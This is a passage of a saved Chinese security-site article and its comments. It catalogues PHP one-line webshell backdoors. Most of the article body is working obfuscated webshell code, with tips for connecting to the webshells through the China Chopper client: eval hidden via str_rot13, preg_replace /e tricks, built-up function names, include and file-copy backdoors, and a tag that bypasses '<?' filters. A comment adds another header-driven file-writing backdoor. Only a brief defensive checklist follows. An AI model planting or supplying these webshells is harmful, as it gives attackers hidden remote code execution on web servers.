<pre class="prettyprint lang-php prettyprinted"><span class="pun">&lt;?</span><span class="pln">php </span><span class="pun">(</span><span class="pln">$_</span><span class="pun">=</span><span class="lit">@$_GET</span><span class="pun">[</span><span class="lit">2</span><span class="pun">]).</span><span class="lit">@$_</span><span class="pun">(</span><span class="pln">$_POST</span><span class="pun">[</span><span class="lit">1</span><span class="pun">])?&gt;</span></pre>
<p style="margin-top:0px;margin-bottom:20px;padding:0px;border:0px;font-variant:inherit;line-height:inherit;vertical-align:baseline;">
	在菜刀里写http://site/1.php?2=assert密码是1
</p>
<p style="margin-top:0px;margin-bottom:20px;padding:0px;border:0px;font-variant:inherit;line-height:inherit;vertical-align:baseline;">
	第二个
</p>
<pre class="prettyprint lang-php prettyprinted"><span class="pun">&lt;?</span><span class="pln">php
$_</span><span class="pun">=</span><span class="str">""</span><span class="pun">;</span><span class="pln">
$_</span><span class="pun">[+</span><span class="str">""</span><span class="pun">]=</span><span class="str">''</span><span class="pun">;</span><span class="pln">
$_</span><span class="pun">=</span><span class="str">"$_"</span><span class="pun">.</span><span class="str">""</span><span class="pun">;</span><span class="pln">
$_</span><span class="pun">=(</span><span class="pln">$_</span><span class="pun">[+</span><span class="str">""</span><span class="pun">]|</span><span class="str">""</span><span class="pun">).(</span><span class="pln">$_</span><span class="pun">[+</span><span class="str">""</span><span class="pun">]|</span><span class="str">""</span><span class="pun">).(</span><span class="pln">$_</span><span class="pun">[+</span><span class="str">""</span><span class="pun">]^</span><span class="str">""</span><span class="pun">);</span><span class="pln">
</span><span class="pun">?&gt;</span><span class="pln">
</span><span class="pun">&lt;?</span><span class="pln">php $</span><span class="pun">{</span><span class="str">'_'</span><span class="pun">.</span><span class="pln">$_</span><span class="pun">}[</span><span class="str">'_'</span><span class="pun">](</span><span class="pln">$</span><span class="pun">{</span><span class="str">'_'</span><span class="pun">.</span><span class="pln">$_</span><span class="pun">}[</span><span class="str">'__'</span><span class="pun">]);?&gt;</span></pre>
<p style="margin-top:0px;margin-bottom:20px;padding:0px;border:0px;font-variant:inherit;line-height:inherit;vertical-align:baseline;">
	在菜刀里写http://site/2.php?_=assert&amp;__=eval($_POST['pass']) 密码是pass。如果你用菜刀的附加数据的话更隐蔽，或者用其它注射工具也可以，因为是post提交的。
</p>
<p style="margin-top:0px;margin-bottom:20px;padding:0px;border:0px;font-variant:inherit;line-height:inherit;vertical-align:baseline;">
	<span style="font-size:12px;font-variant:inherit;line-height:inherit;">第三个</span>
</p>
<pre class="prettyprint lang-php prettyprinted"><span class="pun">(</span><span class="pln">$b4dboy </span><span class="pun">=</span><span class="pln"> $_POST</span><span class="pun">[</span><span class="str">'b4dboy'</span><span class="pun">])</span><span class="pln"> </span><span class="pun">&amp;&amp;</span><span class="pln"> </span><span class="lit">@preg_replace</span><span class="pun">(</span><span class="str">'/ad/e'</span><span class="pun">,</span><span class="str">'@'</span><span class="pun">.</span><span class="pln">str_rot13</span><span class="pun">(</span><span class="str">'riny'</span><span class="pun">).</span><span class="str">'($b4dboy)'</span><span class="pun">,</span><span class="pln"> </span><span class="str">'add'</span><span class="pun">);</span></pre>
<p style="margin-top:0px;margin-bottom:20px;padding:0px;border:0px;font-variant:inherit;line-height:inherit;vertical-align:baseline;">
	str_rot13(‘riny’)即编码后的eval，完全避开了关键字，又不失效果，让人吐血！
</p>
<p style="margin-top:0px;margin-bottom:20px;padding:0px;border:0px;font-variant:inherit;line-height:inherit;vertical-align:baseline;">
	<strong>最后列几个高级的PHP一句话木马后门：</strong>
</p>
<pre class="prettyprint lang-php prettyprinted"><span class="lit">1</span><span class="pun">、</span><span class="pln">
$hh </span><span class="pun">=</span><span class="pln"> </span><span class="str">"p"</span><span class="pun">.</span><span class="str">"r"</span><span class="pun">.</span><span class="str">"e"</span><span class="pun">.</span><span class="str">"g"</span><span class="pun">.</span><span class="str">"_"</span><span class="pun">.</span><span class="str">"r"</span><span class="pun">.</span><span class="str">"e"</span><span class="pun">.</span><span class="str">"p"</span><span class="pun">.</span><span class="str">"l"</span><span class="pun">.</span><span class="str">"a"</span><span class="pun">.</span><span class="str">"c"</span><span class="pun">.</span><span class="str">"e"</span><span class="pun">;</span><span class="pln">
$hh</span><span class="pun">(</span><span class="str">"/[discuz]/e"</span><span class="pun">,</span><span class="pln">$_POST</span><span class="pun">[</span><span class="str">'h'</span><span class="pun">],</span><span class="str">"Access"</span><span class="pun">);</span><span class="pln">
</span><span class="com">//菜刀一句话</span><span class="pln">
</span><span class="lit">2</span><span class="pun">、</span><span class="pln">
$filename</span><span class="pun">=</span><span class="pln">$_GET</span><span class="pun">[</span><span class="str">'xbid'</span><span class="pun">];</span><span class="pln">
include </span><span class="pun">(</span><span class="pln">$filename</span><span class="pun">);</span><span class="pln">
</span><span class="com">//危险的include函数，直接编译任何文件为php格式运行</span><span class="pln">
</span><span class="lit">3</span><span class="pun">、</span><span class="pln">
$reg</span><span class="pun">=</span><span class="str">"c"</span><span class="pun">.</span><span class="str">"o"</span><span class="pun">.</span><span class="str">"p"</span><span class="pun">.</span><span class="str">"y"</span><span class="pun">;</span><span class="pln">
$reg</span><span class="pun">(</span><span class="pln">$_FILES</span><span class="pun">[</span><span class="typ">MyFile</span><span class="pun">][</span><span class="pln">tmp_name</span><span class="pun">],</span><span class="pln">$_FILES</span><span class="pun">[</span><span class="typ">MyFile</span><span class="pun">][</span><span class="pln">name</span><span class="pun">]);</span><span class="pln">
</span><span class="com">//重命名任何文件</span><span class="pln">
</span><span class="lit">4</span><span class="pun">、</span><span class="pln">
$gzid </span><span class="pun">=</span><span class="pln"> </span><span class="str">"p"</span><span class="pun">.</span><span class="str">"r"</span><span class="pun">.</span><span class="str">"e"</span><span class="pun">.</span><span class="str">"g"</span><span class="pun">.</span><span class="str">"_"</span><span class="pun">.</span><span class="str">"r"</span><span class="pun">.</span><span class="str">"e"</span><span class="pun">.</span><span class="str">"p"</span><span class="pun">.</span><span class="str">"l"</span><span class="pun">.</span><span class="str">"a"</span><span class="pun">.</span><span class="str">"c"</span><span class="pun">.</span><span class="str">"e"</span><span class="pun">;</span><span class="pln">
$gzid</span><span class="pun">(</span><span class="str">"/[discuz]/e"</span><span class="pun">,</span><span class="pln">$_POST</span><span class="pun">[</span><span class="str">'h'</span><span class="pun">],</span><span class="str">"Access"</span><span class="pun">);</span><span class="pln">
</span><span class="com">//菜刀一句话</span><span class="pln">
</span><span class="lit">5</span><span class="pun">、</span><span class="pln">include </span><span class="pun">(</span><span class="pln">$uid</span><span class="pun">);</span><span class="pln">
</span><span class="com">//危险的include函数，直接编译任何文件为php格式运行，POST www.xxx.com/index.php?uid=/home/www/bbs/image.gif</span><span class="pln">
</span><span class="com">//gif插一句话</span><span class="pln">
</span><span class="lit">6</span><span class="pun">、典型一句话</span><span class="pln">
</span><span class="pun">程序后门代码</span><span class="pln">
</span><span class="pun">&lt;?</span><span class="pln">php eval_r</span><span class="pun">(</span><span class="pln">$_POST</span><span class="pun">[</span><span class="pln">sb</span><span class="pun">])?&gt;</span><span class="pln">
</span><span class="pun">程序代码</span><span class="pln">
</span><span class="pun">&lt;?</span><span class="pln">php </span><span class="lit">@eval_r</span><span class="pun">(</span><span class="pln">$_POST</span><span class="pun">[</span><span class="pln">sb</span><span class="pun">])?&gt;</span><span class="pln">
</span><span class="com">//容错代码</span><span class="pln">
</span><span class="pun">程序代码</span><span class="pln">
</span><span class="pun">&lt;?</span><span class="pln">php </span><span class="kwd">assert</span><span class="pun">(</span><span class="pln">$_POST</span><span class="pun">[</span><span class="pln">sb</span><span class="pun">]);?&gt;</span><span class="pln">
</span><span class="com">//使用lanker一句话客户端的专家模式执行相关的php语句</span><span class="pln">
</span><span class="pun">程序代码</span><span class="pln">
</span><span class="pun">&lt;?</span><span class="pln">$_POST</span><span class="pun">[</span><span class="str">'sa'</span><span class="pun">](</span><span class="pln">$_POST</span><span class="pun">[</span><span class="str">'sb'</span><span class="pun">]);?&gt;</span><span class="pln">
</span><span class="pun">程序代码</span><span class="pln">
</span><span class="pun">&lt;?</span><span class="pln">$_POST</span><span class="pun">[</span><span class="str">'sa'</span><span class="pun">](</span><span class="pln">$_POST</span><span class="pun">[</span><span class="str">'sb'</span><span class="pun">],</span><span class="pln">$_POST</span><span class="pun">[</span><span class="str">'sc'</span><span class="pun">])?&gt;</span><span class="pln">
</span><span class="pun">程序代码</span><span class="pln">
</span><span class="pun">&lt;?</span><span class="pln">php
</span><span class="lit">@preg_replace</span><span class="pun">(</span><span class="str">"/[email]/e"</span><span class="pun">,</span><span class="pln">$_POST</span><span class="pun">[</span><span class="str">'h'</span><span class="pun">],</span><span class="str">"error"</span><span class="pun">);</span><span class="pln">
</span><span class="pun">?&gt;</span><span class="pln">
</span><span class="com">//使用这个后,使用菜刀一句话客户端在配置连接的时候在"配置"一栏输入</span><span class="pln">
</span><span class="pun">程序代码</span><span class="pln">
</span><span class="pun">&lt;</span><span class="pln">O</span><span class="pun">&gt;</span><span class="pln">h</span><span class="pun">=</span><span class="lit">@eval_r</span><span class="pun">(</span><span class="pln">$_POST1</span><span class="pun">);&lt;/</span><span class="pln">O</span><span class="pun">&gt;</span><span class="pln">
</span><span class="pun">程序代码</span><span class="pln">
</span><span class="pun">&lt;</span><span class="pln">script language</span><span class="pun">=</span><span class="str">"php"</span><span class="pun">&gt;</span><span class="lit">@eval_r</span><span class="pun">(</span><span class="pln">$_POST</span><span class="pun">[</span><span class="pln">sb</span><span class="pun">])&lt;/</span><span class="pln">script</span><span class="pun">&gt;</span><span class="pln">
</span><span class="com">//绕过&lt;?限制的一句话</span></pre>
<p style="margin-top:0px;margin-bottom:20px;padding:0px;border:0px;font-variant:inherit;line-height:inherit;vertical-align:baseline;">
	综上，这些PHP一句话后门可谓五脏俱全，一不小心您肯定中招了，而我们今天这篇文章的重中之重在哪呢？重点就在下边的总结!
</p>
<p style="margin-top:0px;margin-bottom:20px;padding:0px;border:0px;font-variant:inherit;line-height:inherit;vertical-align:baseline;">
	<span style="font-variant:inherit;line-height:inherit;font-size:12px;"><strong></strong><span style="white-space:nowrap;"><strong>如何应对PHP一句话后门：</strong></span><strong></strong><br>
</span>
</p>
<p style="margin-top:0px;margin-bottom:20px;padding:0px;border:0px;font-variant:inherit;line-height:inherit;vertical-align:baseline;">
	<span style="font-variant:inherit;line-height:inherit;font-size:12px;">我们强调几个关键点，看这文章的你相信不是门外汉，我也就不啰嗦了：</span>
</p>
<p style="margin-top:0px;margin-bottom:20px;padding:0px;border:0px;font-variant:inherit;line-height:inherit;vertical-align:baseline;">
	<span style="font-variant:inherit;line-height:inherit;font-size:12px;"> </span>
</p>
<pre class="prettyprint lang-html prettyprinted"><span class="pln">1，对PHP程序编写要有安全意识
2，服务器日志文件要经常看，经常备份
3，对每个站点进行严格的权限分配
4，对动态文件及目录经常批量安全审查
5，学会如何进行手工杀毒《即行为判断查杀》
6，时刻关注，或渗入活跃的网络安全营地
7，对服务器环境层级化处理，哪怕一个函数也可做规则</span></pre>
<p style="margin-top:0px;margin-bottom:20px;padding:0px;border:0px;font-variant:inherit;line-height:inherit;vertical-align:baseline;">
	<span style="font-variant:inherit;line-height:inherit;">我们</span>认为当管理的站点多了，数据量大时，我们应合理应用一些辅助工具，但不应完全依赖这些工具，技术是时刻在更新进步的，最为重要的是你应学会和理解，编写这些强悍后门的人所处思维，角色上的换位可为你带来更大的进步。
</p>
<p style="margin-top:0px;margin-bottom:20px;padding:0px;border:0px;font-variant:inherit;line-height:inherit;vertical-align:baseline;">
	<span style="font-variant:inherit;line-height:inherit;font-size:12px;color:#009900;">via[</span><a href="http://www.oooceo.com/security/php-word/" rel="nofollow" target="_blank" style="font-variant:inherit;line-height:inherit;font-size:12px;"><span style="color:#009900;"><span style="white-space:nowrap;">亦</span>家网络</span></a><span style="font-variant:inherit;line-height:inherit;font-size:12px;color:#009900;">]</span></p>
        </div>
        <div class="article-oper article-oper-new">
			<style>
				@font-face {font-family: 'iconfont';
					src: url('http://static.3001.net/iconfonts/iconfont.eot'); /* IE9*/
					src: url('http://static.3001.net/iconfonts/iconfont.eot?#iefix') format('embedded-opentype'), /* IE6-IE8 */
					url('http://static.3001.net/iconfonts/iconfont.woff') format('woff'), /* chrome、firefox */
					url('http://static.3001.net/iconfonts/iconfont.ttf') format('truetype'), /* chrome、firefox、opera、Safari, Android, iOS 4.2+*/
					url('http://static.3001.net/iconfonts/iconfont.svg#iconfont') format('svg'); /* iOS 4.1- */
				}
			</style>
			<div class="share-new fixed" style="width: 893px; left: 352px;">
				<div class="share-author">
											<a href="http://www.freebuf.com/author/oooceo" title="由 oooceo 发布" rel="author">
							<img src="./那些强悍的PHP一句话后门 - FreeBuf.COM _ 关注黑客与极客_files/wp-user-avatar-96x96.png" width="50" height="50" alt="" class="avatar avatar-50 wp-user-avatar wp-user-avatar-50 photo avatar-default">							<!--							<img src="http://image.3001.net/2015/06/17.jpg" alt="ArthurKiller">-->
						</a>
						<div class="share-author-info">
														<a class="author-name" href="http://www.freebuf.com/author/oooceo">oooceo</a>
							<!--<span class="icon-f"></span>-->
							<span><i class="colour-red">1</i>篇文章</span><span>等级：<i class="colour-green">1</i>级</span>
						</div>
									</div>
				<div class="user-center clearfix">
					<a href="http://www.freebuf.com/author/oooceo" title="个人主页" target="_blank"></a>
					<a href="http://www.freebuf.com/user/pm?pmaction=newmessage&amp;to=oooceo" title="私信" target="_blank"></a>
<!--					<a href="http://www.freebuf.com/author/ArthurKiller" title="个人主页">&#xe61b;</a>-->
<!--					<a href="http://www.freebuf.com/user/pm?pmaction=newmessage&to=ArthurKiller" title="私信">&#xe611;</a>-->
				</div>
				<div class="share-ctrl clearfix">
					<div class="bdsharebuttonbox clearfix bdshare-button-style1-24" data-bd-bind="1479437553340">
						<a href="http://www.freebuf.com/articles/web/9396.html#" data-cmd="tsina" title="分享到新浪微博"></a>
						<a href="http://www.freebuf.com/articles/web/9396.html#" data-cmd="weixin" title="分享到微信" id="weixin"></a>
						<a href="http://www.freebuf.com/articles/web/9396.html#" data-cmd="qzone" title="分享到QQ空间"></a>
						<a href="http://www.freebuf.com/articles/web/9396.html#">|</a>
					</div>
				</div>
				<div class="user-ctrl clearfix">
										<a href="http://www.freebuf.com/oauth" title="收藏" class="like-grey"></a>
					<!--					<a href="#" title="收藏" class="like-grey">&#xe798;</a>-->
<!--					<a href="#" title="收藏" class="like-red"><img src="http://image.3001.net/images/new/user-like.png" /></a>-->
					<a href="http://www.freebuf.com/articles/web/9396.html#respond" title="评论"></a>
					<!--					<a href="#" title="文章纠正">&#xe6e3;</a>-->
					<a href="http://www.freebuf.com/articles/web/9396.html#">|</a>
					<span class="info-alert"></span>
				</div>
			</div>
			<script>
				window._bd_share_config={
					"common": {
						"bdSnsKey": {},
						"bdText": "",
						"bdMini": "2",
						"bdMiniList": ["qzone", "tsina", "weixin"],
						"bdPic": "",
						"bdStyle": "1",
						"bdSize": "24"
					},
					"share":{},
				};
				with(document)0[
					(getElementsByTagName('head')[0]||body).
					appendChild(createElement('script')).
						src='http://bdimg.share.baidu.com/static/api/js/share.js?v=89860593.js?cdnversion='+~(-new Date()/36e5)
					];
				//控制垂直方向分享模块的定位
				function shareFixVertical(){
					var offsetTop = jQuery(".article-oper").get(0).offsetTop;
					var win_h = jQuery(window).height();
					var win_w = jQuery(window).width();
					var scrollTop = document.body.scrollTop||document.documentElement.scrollTop;
					var _height = offsetTop-scrollTop;
					if(_height>=win_h-130&&win_w>975){
						var _width = jQuery("#getWidth").innerWidth()-30;
						var _left = jQuery("#getWidth").offset().left+15;
						jQuery(".share-new").addClass("fixed");
						jQuery(".fixed").css({
							width:_width,
							left:_left
						});

					}else{
						jQuery(".share-new").removeClass("fixed");
						jQuery(".share-new").css({
							width: "100%"
						});
					}
				}
				//控制水平方向分享模块的定位
				function shareFixHorizontal(){
					var _width = jQuery("#getWidth").innerWidth()-30;
					var _left = jQuery("#getWidth").get(0).offsetLeft+15;
					var win_w = document.documentElement.clientWidth || document.body.clientWidth;
					console.log(win_w);
					jQuery(".fixed").css({
						width:_width,
						left:_left
					});
					if(win_w< 975){
						jQuery(".share-new").css({
							width: "100%",
							left: "0"
						});
					}else{
						var _width = jQuery("#getWidth").innerWidth()-30;
						var _left = jQuery("#getWidth").get(0).offsetLeft+15;
						jQuery(".fixed").css({
							width:_width,
							left:_left
						});
					}
				}

				jQuery(window).on("load",function(){
					shareFixVertical();
				});

				jQuery(window).on("scroll",function(){
					shareFixVertical();
				});

				jQuery(window).on("resize",function(){
					shareFixHorizontal();
				})
				$(document).click(function(e){
					if($(e.target).attr("id")=="weixin"){
						$("#bdshare_weixin_qrcode_dialog").show();
					}else{
						$("#bdshare_weixin_qrcode_dialog").hide();
					}
				})
			</script>
        </div>
                        		        <div class="article-pager">
          <ul>
            <li class="previous"><span>上一篇：</span><a href="http://www.freebuf.com/articles/web/9337.html" rel="prev">又一钓鱼经典案列分析</a>			</li>
            <li class="next"><span>下一篇：</span>
			<a href="http://www.freebuf.com/articles/web/7793.html" rel="next">一种针对网络图片功能的攻击方式</a>			</li>
          </ul>
        </div>
      </div>
      </div>
          <div class="comment-bright"><div class="main-tit04">
    <h3>这些评论亮了</h3></div>      <ul>      <li>
            <div class="user_photo"> <a href="http://www.freebuf.com/author/oooceo">
            <img src="./那些强悍的PHP一句话后门 - FreeBuf.COM _ 关注黑客与极客_files/wp-user-avatar-96x96.png" width="58" height="58"></a>
             </div>
            <div class="tit"><span class="name"> <a href="http://www.freebuf.com/author/oooceo" target="_blank">oooceo</a>  </span> 
						<span class="icon-f">  </span> 
			<span class="rank">(1级)</span>
						<span class="explain"></span>
			<span class="reply"><a onclick="return addComment.moveForm( &#39;comment-&#39;,&#39;&#39;, &#39;respond&#39;,&#39;9396&#39; ) " href="http://www.freebuf.com/articles/web/9396.html?replytocom=#respond" class="comment-reply-link" rel="nofollow">回复</a></span></div>
            <div class="txt">
						@落叶纷飞&nbsp;  以宏观方向展示了各种DIY出来的后门，本文并非是抽象的拿某一例来编写特定后门，所以不要太挑剔，现在的ecshop存在两个内核级后门你能读出来吗？之前被一牛读出来官方死不承认，还有一个一直没人爆出来，强悍不能单一的抽象某个例子。</div>
            <div class="but"><span class="vote-count">)</span><span style="none" id="cos_support-29045" class="vote-count">28</span><span class="vote-count">(</span><span class="vote">  <a class="ilike_icon" id="vote4-29045" href="javascript:acv_vote(9045,1,2);">亮了</a></span></div>
          </li>
            <li>
            <div class="user_photo"> <a href="http://www.freebuf.com/author/anlfi">
            <img src="./那些强悍的PHP一句话后门 - FreeBuf.COM _ 关注黑客与极客_files/20130928021210.jpg" width="58" height="58"></a>
             </div>
            <div class="tit"><span class="name"> <a href="http://www.freebuf.com/author/anlfi" target="_blank">anlfi</a>  </span> 
						<span class="icon-f">  </span> 
			<span class="rank">(5级)</span>
						<span class="explain"></span>
			<span class="reply"><a onclick="return addComment.moveForm( &#39;comment-&#39;,&#39;&#39;, &#39;respond&#39;,&#39;9396&#39; ) " href="http://www.freebuf.com/articles/web/9396.html?replytocom=#respond" class="comment-reply-link" rel="nofollow">回复</a></span></div>
            <div class="txt">
						@oooceo&nbsp;  <br>求解怎么建力数学模 来解决抽象问题<br>微观粒子运动可测吗 求解重力的的最小微粒是怎么样的纯在<br>其实这些后门在以前都用过了 但写出来对作者有什么意义呢？呵呵<br>@落叶纷飞 <br>你是笨蛋吗 <br>所有人都以自己的方式去理解对方的语言以及世界 所以每个人都能读出不同的含义<br>文章也是如此 所以只要去取自己有用的部分即可 <br>就像我和你没有关系一样 所有人都是如此<br>看起来比较孤独 但其实人生就是这样 直到最后也就只有你自己知道死的含义一样<br>哪怕你再疼苦也不会有人知道你有多疼 <br>所以会诞生除2种性格 最求纯在感 藐视一切纯在 当然还有无所谓 的因为现实就是如此<br>世界就像是一个微观世界 充满随机性 充满思想的碰撞 写文章有意义吗 国家有意义吗 军队有意义吗<br>一切只是你认为很重要的东西 你才会去做 <br>至于意义就是你去做了并且 获得了什么 达成了什么目的 或者就是为了好玩<br>然而对于普通人这些根本和他们没有关系<br>补充一个吧<br>toby57 早期用的后门<br>&lt;?php  <br>if(crypt($_SERVER['HTTP_H0ST'],51)=='514zR17F8j0q6'){@file_put_contents($_SERVER['HTTP_X'],$_SERVER['HTTP_Y']);header("Location: ./".$_SERVER['HTTP_X']);};  <br>?&gt;<br>后门的方式随机性太多了 你怎么不去一个一个说出来<br>所以我认为你很有意思 可以玩一玩<br>但其实和我也没什么关系呢<br>不知道你是 在乎别人对你的存在感 还是无所谓呢呵呵 <br>或者面对如此寂寞的世界无视一切<br>只最求一样东西呢<br>其实我的回复就只是玩一玩 看看到底是你们回复的多还是我回复的多<br>又或者引导出你们的内心 然后出现引导出大量回复来分析人性<br>不得不说社交的确是一种进步 就算你怎么了解人性 你也不知道它的魅力所在</div>
            <div class="but"><span class="vote-count">)</span><span style="none" id="cos_support-29114" class="vote-count">12</span><span class="vote-count">(</span><span class="vote">  <a class="ilike_icon" id="vote4-29114" href="javascript:acv_vote(9114,1,2);">亮了</a></span></div>
          </li>
            <li>
            <div class="user_photo"> <a href="http://www.freebuf.com/author/anlfi">
            <img src="./那些强悍的PHP一句话后门 - FreeBuf.COM _ 关注黑客与极客_files/20130928021210.jpg" width="58" height="58"></a>
             </div>
            <div class="tit"><span class="name"> <a href="http://www.freebuf.com/author/anlfi" target="_blank">anlfi</a>  </span> 
						<span class="icon-f">  </span> 
			<span class="rank">(5级)</span>
						<span class="explain"></span>
			<span class="reply"><a onclick="return addComment.moveForm( &#39;comment-&#39;,&#39;&#39;, &#39;respond&#39;,&#39;9396&#39; ) " href="http://www.freebuf.com/articles/web/9396.html?replytocom=#respond" class="comment-reply-link" rel="nofollow">回复</a></span></div>
            <div class="txt">
						这些后门写的真不安全（不符合安全标准） <br>POST GET 一些包头参数 <br>直接控制参数变量与函数<br>一般这种不管是不是后门都会丢下去重做<br>就是查后门 <br>也只要查多出来的 POST GET Cookie 的一些变量 <br>定位文件 就行了<br>最起码要做到间接利用根据程序本身设计后门<br>基于校验HASH就不说了<br>最多只能bypass一些AV了<br>所谓的强悍 也不过就是方法不同而已 这么多函数 完全可以有N种方法组合自己后门</div>
            <div class="but"><span class="vote-count">)</span><span style="none" id="cos_support-29032" class="vote-count">8</span><span class="vote-count">(</span><span class="vote">  <a class="ilike_icon" id="vote4-29032" href="javascript:acv_vote(9032,1,2);">亮了</a></span></div>
          </li>
            <li>
            <div class="user_photo"> <a href="http://www.freebuf.com/author/%E8%90%BD%E5%8F%B6%E7%BA%B7%E9%A3%9E">
            <img src="./那些强悍的PHP一句话后门 - FreeBuf.COM _ 关注黑客与极客_files/wp-user-avatar-96x96.png" width="58" height="58"></a>
             </div>
            <div class="tit"><span class="name"> <a href="http://www.freebuf.com/author/%E8%90%BD%E5%8F%B6%E7%BA%B7%E9%A3%9E" target="_blank">落叶纷飞</a>  </span> 
						<span class="icon-f">  </span> 
			<span class="rank">(2级)</span>
						<span class="explain"></span>
			<span class="reply"><a onclick="return addComment.moveForm( &#39;comment-&#39;,&#39;&#39;, &#39;respond&#39;,&#39;9396&#39; ) " href="http://www.freebuf.com/articles/web/9396.html?replytocom=#respond" class="comment-reply-link" rel="nofollow">回复</a></span></div>
            <div class="txt">
						“最起码要做到间接利用根据程序本身设计后门”<br>那这篇文章该怎么写？<br>“所谓的强悍 也不过就是方法不同而已 这么多函数 完全可以有N种方法组合自己后门”<br>求不用任何函数不用任何代码实现的后门</div>
            <div class="but"><span class="vote-count">)</span><span style="none" id="cos_support-29044" class="vote-count">7</span><span class="vote-count">(</span><span class="vote">  <a class="ilike_icon" id="vote4-29044" href="javascript:acv_vote(9044,1,2);">亮了</a></span></div>
          </li>
            <li>
            <div class="user_photo">             <img src="./那些强悍的PHP一句话后门 - FreeBuf.COM _ 关注黑客与极客_files/pic8.png">             </div>
            <div class="tit"><span class="name"> 呵呵 </span> 
						<span class="explain"></span>
			<span class="reply"><a onclick="return addComment.moveForm( &#39;comment-&#39;,&#39;&#39;, &#39;respond&#39;,&#39;9396&#39; ) " href="http://www.freebuf.com/articles/web/9396.html?replytocom=#respond" class="comment-reply-link" rel="nofollow">回复</a></span></div>
            <div class="txt">
						@anlfi&nbsp;   只能对你说呵呵。那你放个更牛逼的几十种方法出来啊！光说不练，装逼犯</div>
            <div class="but"><span class="vote-count">)</span><span style="none" id="cos_support-29057" class="vote-count">7</span><span class="vote-count">(</span><span class="vote">  <a class="ilike_icon" id="vote4-29057" href="javascript:acv_vote(9057,1,2);">亮了</a></span></div>
          </li>
         </ul></div><div class="comment-list">
      <div class="main-tit02">
		<a rel="nofollow" class="btnbtn-default btn-comment" href="http://www.freebuf.com/articles/web/9396.html#respond">发表评论</a>
        <h3>已有 <span class="color_red">46</span> 条评论
      </h3></div>
      <ul>
         <li class="comment byuser comment-author-anlfi even thread-even depth-1" id="li-comment-9032">
    <div id="comment-9032">
        <div class="photo"> <a href="http://www.freebuf.com/author/anlfi">
    <img src="./那些强悍的PHP一句话后门 - FreeBuf.COM _ 关注黑客与极客_files/20130928021210.jpg"></a>
     </div>
    <div class="tit"> 
	    <span class="name"> <a href="http://www.freebuf.com/author/anlfi" target="_blank">anlfi&nbsp;</a>  </span>
        		
		<span class="icon-f"> </span>
		<span class="rank">(5级)</span>
				<span class="explain">  </span>
		<span class="time">&nbsp;2013-05-10</span>
		<span class="time"> </span>
        <span class="useragent_output_custom"></span>
        <span class="useragent_output_custom"></span> 
		<span class="reply">
		        <!-- 正常情况 -->
           <a onclick="return addComment.moveForm( &#39;comment-9032&#39;,&#39;9032&#39;, &#39;respond&#39;,&#39;9396&#39; ) " href="http://www.freebuf.com/articles/web/9396.html?replytocom=9032#respond" class="comment-reply-link" rel="nofollow">回复</a>
        	    </span>
		<span class="floor">1楼</span>
	</div>
	    <div class="txt">
	  <p class="useragent_output_custom"></p>
      <p>这些后门写的真不安全（不符合安全标准）<br>
POST GET 一些包头参数<br>
直接控制参数变量与函数<br>
一般这种不管是不是后门都会丢下去重做<br>
就是查后门<br>
也只要查多出来的 POST GET Cookie 的一些变量<br>
定位文件 就行了<br>
最起码要做到间接利用根据程序本身设计后门<br>
基于校验HASH就不说了<br>
最多只能bypass一些AV了<br>
所谓的强悍 也不过就是方法不同而已 这么多函数 完全可以有N种方法组合自己后门</p>
<div class="comment-tools">
<div class="vote" id="vote-9032"><span id="acv_stat_9032"></span><a class="ilike_icon" id="vote4-9032" href="javascript:acv_vote(9032,1);">亮了</a>(<span id="cos_support-9032">8</span>)</div>
<div class="dropup"><a class="dropdown-toggle btn-report" type="button" data-toggle="dropdown" aria-haspopup="true" aria-expanded="false" style="display:none;"> 举报</a>
<ul class="dropdown-menu" style="display:none;bottom:auto;">
<li><a data-id="9032" class="click_report" href="javascript:;">广告等垃圾信息</a></li>
<li><a data-id="9032" class="click_report" href="javascript:;">不友善内容</a></li>
<li><a data-id="9032" class="click_report" href="javascript:;">违反法律法规的内容</a></li>
<li><a data-id="9032" class="click_report" href="javascript:;">不宜公开讨论的政治内容</a></li>
<li><a data-id="9032" class="click_report" href="javascript:;">其他</a></li>
</ul></div>
</div>
	</div></div>
<ul class="children">
<li class="comment byuser comment-author-Mystery odd alt depth-2" id="li-comment-9033">
    <div id="comment-9033">
        <div class="photo"> <a href="http://www.freebuf.com/author/Mystery%E3%80%82">
    <img src="./那些强悍的PHP一句话后门 - FreeBuf.COM _ 关注黑客与极客_files/20150329151400763592.png.gif"></a>
     </div>
    <div class="tit"> 
	    <span class="name"> <a href="http://www.freebuf.com/author/Mystery%E3%80%82" target="_blank">Mystery。&nbsp;</a>  </span>
        		
		<span class="icon-f"> <a href="http://www.freebuf.com/bufer" target="_blank"><img src="./那些强悍的PHP一句话后门 - FreeBuf.COM _ 关注黑客与极客_files/f1.png" title="认证作者"></a></span>
		<span class="rank">(6级)</span>
				<span class="explain"> 肆零叁文化传媒 COO </span>
		<span class="time">&nbsp;2013-05-10</span>
		<span class="time"> </span>
        <span class="useragent_output_custom"></span>
        <span class="useragent_output_custom"></span> 
		<span class="reply">
		        <!-- 正常情况 -->
           <a onclick="return addComment.moveForm( &#39;comment-9033&#39;,&#39;9033&#39;, &#39;respond&#39;,&#39;9396&#39; ) " href="http://www.freebuf.com/articles/web/9396.html?replytocom=9033#respond" class="comment-reply-link" rel="nofollow">回复</a>
        	    </span>
		<span class="floor"></span>
	</div>
	    <div class="txt">
	  <p class="useragent_output_custom"></p>
      <p>@anlfi&nbsp;  所谓的强悍，就是变形了一下语句而已。</p>
<div class="comment-tools">
<div class="vote" id="vote-9033"><span id="acv_stat_9033"></span><a class="ilike_icon" id="vote4-9033" href="javascript:acv_vote(9033,1);">亮了</a>(<span id="cos_support-9033">4</span>)</div>
<div class="dropup"><a class="dropdown-toggle btn-report" type="button" data-toggle="dropdown" aria-haspopup="true" aria-expanded="false" style="display:none;"> 举报</a>
<ul class="dropdown-menu" style="display:none;bottom:auto;">
<li><a data-id="9033" class="click_report" href="javascript:;">广告等垃圾信息</a></li>
<li><a data-id="9033" class="click_report" href="javascript:;">不友善内容</a></li>
<li><a data-id="9033" class="click_report" href="javascript:;">违反法律法规的内容</a></li>
<li><a data-id="9033" class="click_report" href="javascript:;">不宜公开讨论的政治内容</a></li>
<li><a data-id="9033" class="click_report" href="javascript:;">其他</a></li>
</ul></div>
</div>
	</div></div>
<ul class="children">
<li class="comment byuser comment-author-anlfi even depth-3" id="li-comment-9136">
    <div id="comment-9136">
        <div class="photo"> <a href="http://www.freebuf.com/author/anlfi">
    <img src="./那些强悍的PHP一句话后门 - FreeBuf.COM _ 关注黑客与极客_files/20130928021210.jpg"></a>
     </div>
    <div class="tit"> 
